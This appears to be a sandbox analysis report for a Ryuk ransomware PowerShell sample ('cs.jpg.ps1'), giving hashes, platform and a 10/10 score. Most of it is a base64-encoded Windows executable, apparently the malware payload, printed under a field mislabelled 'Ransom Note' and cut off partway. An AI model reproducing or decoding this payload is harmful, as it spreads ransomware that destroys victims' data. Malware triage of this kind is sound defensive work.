ryuk | 3fd4cc4c6b673b37461086049a37d29fa05cd0b3773471ac087ea5eabdd57141

Analysis

max time kernel
150s
max time network
142s
platform
windows7_x64
resource
win7-en
submitted
08-09-2021 11:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cs.jpg.ps1
Size

5KB
MD5

51a645c8ec38c1c387184971fb25d415
SHA1

25454269f892c41c4402ad2a0f6a6550b6073710
SHA256

3fd4cc4c6b673b37461086049a37d29fa05cd0b3773471ac087ea5eabdd57141
SHA512

d819b5d5dff059406f223c27cdffbbaff2a11053ee1ab2dbc95d54dd9ee9ecfd7038209216506eeb765f9234ef56b792dc130ddd29402db4f24bea1add0be43f

Score

10^/10

ryuk persistence ransomware

Malware Config

Extracted

Path

C:\Users\Public\basemsf.txt

Family

ryuk

Ransom Note

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD8pNTAuMW6k7jFupO4xbqTO9m0k6zFupOO47CTgMW6k3vK55O9xbqTuMW7k+PFupOO47GTvcW6k7jFupO5xbqTUNqxk7rFupNQ2r6TucW6k1JpY2i4xbqTAAAAAAAAAABQRQAATAEFAMFnBmEAAAAAAAAAAOAADiELAQYAAJAAAADQYgAAAAAAeVgAAAAQAAAAoAAAAAAAEAAQAAAAEAAABAAAAAAAAAAEAAAAAAAAAADAbgAAEAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAABgrQAAQgAAAHSmAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALBuAFwHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAOAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhocAAAAQAAAAkAAAABAAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAKINAAAAoAAAABAAAACgAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABAamIAALAAAABwYgAAsAAAAAAAAAAAAAAAAAAAQAAAwC52bXBzMAAAUIQLAAAgYwAAkAsAACBjAAAAAAAAAAAAAAAAAGAAAGAucmVsb2MAAFwHAAAAsG4AABAAAACwbgAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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A4PDBGaJB4PHAosDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwJbg8MEU4sbiwODwwRmiQeDxwKLA4PDBIgHR4sDg8MEiAdHiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRTuRAAAACLG4HDCAAAAFNRixuLA4PDBIkHg8cEiwODwwSJB4PHBFlbg8MESQ+F3P///1uDwwRbg8MEM8D/FQCgABCQkDllwHQXaIgBAABoExUCBGgGAAAA6MYoAACDxAxQi128U4t9uIsDg8MEiQeDxwRXiz9TZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRbgcMUAAAAX4PHBFeLP1NmiwODwwKJB4PHBIoDQ4kHg8cEigNDiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBFeLP7kQAAAAgccIAAAAU1dRiz+LA4PDBIkHg8cEiwODwwSJB4PHBFlfW4PHBIHDCAAAAEkPhdT///9fg8cEW4HD4AAAAF+DxwTo4SYAAIPEBFiJRbSJZbD/dbT/dcSLRfhQaPgAAADoySYAAIPEBIv4W1CJXaiJRayLA4PDBIkHg8cEU4sbiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwJbg8MEU4sbiwODwwRmiQeDxwKLA4PDBIgHR4sDg8MEiAdHiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRTuRAAAACLG4HDCAAAAFNRixuLA4PDBIkHg8cEiwODwwSJB4PHBFlbg8MESQ+F3P///1uDwwRbg8MEM